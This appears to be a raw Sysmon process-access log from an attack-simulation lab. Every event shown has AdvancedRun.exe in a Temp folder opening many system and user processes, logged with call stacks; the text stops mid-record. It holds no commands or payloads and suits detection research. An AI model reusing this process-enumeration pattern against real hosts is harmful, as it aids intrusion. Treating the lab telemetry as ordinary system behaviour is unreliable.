20:04:05.923{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-FE2D-61EA-B005-000000002702}108C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004063684Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.923{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-FE2D-61EA-AF05-000000002702}5296C:\Windows\System32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004063683Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.923{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-F392-61EA-4B04-000000002702}948C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004063682Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.923{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-F392-61EA-4A04-000000002702}5408C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004063681Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.923{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-E497-61EA-F401-000000002702}2136C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004063680Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.922{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004063679Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.922{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-E491-61EA-F201-000000002702}3896C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004063678Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.922{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB6F-61EA-B100-000000002702}2348C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004063677Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.921{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB13-61EA-9A00-000000002702}5612C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004063676Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.921{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB12-61EA-9900-000000002702}5508C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004063675Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.921{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB12-61EA-9700-000000002702}5364C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004063674Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.921{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB11-61EA-9500-000000002702}428C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004063673Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.921{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-9000-000000002702}3336C:\Windows\System32\taskhostw.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004063672Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.921{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-8F00-000000002702}4948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004063671Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.921{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-8E00-000000002702}4912C:\Windows\System32\sihost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004063670Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.920{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-8D00-000000002702}4820C:\Windows\System32\RuntimeBroker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004063669Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.919{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-8C00-000000002702}4808C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004063668Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.919{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB07-61EA-8800-000000002702}4836C:\Program 